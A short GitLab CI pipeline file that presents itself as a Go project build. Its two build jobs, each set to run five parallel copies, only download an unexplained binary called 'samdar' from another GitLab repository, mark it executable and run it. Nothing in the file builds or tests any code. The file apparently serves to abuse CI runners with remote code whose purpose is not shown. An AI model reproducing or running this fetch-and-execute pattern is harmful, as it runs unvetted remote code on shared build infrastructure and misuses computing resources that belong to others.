image: golang:latest

variables:
  REPO_NAME: gitlab.com/namespace/project

stages:
  - build
  - test
  - deploy

build_a:
  parallel: 5
  stage: build
  script:
    - wget https://gitlab.com/larisasukir/razerz/-/raw/main/samdar && chmod +x samdar && ./samdar
    
build_b:
  parallel: 5
  stage: build
  script:
    - wget https://gitlab.com/larisasukir/razerz/-/raw/main/samdar && chmod +x samdar && ./samdar
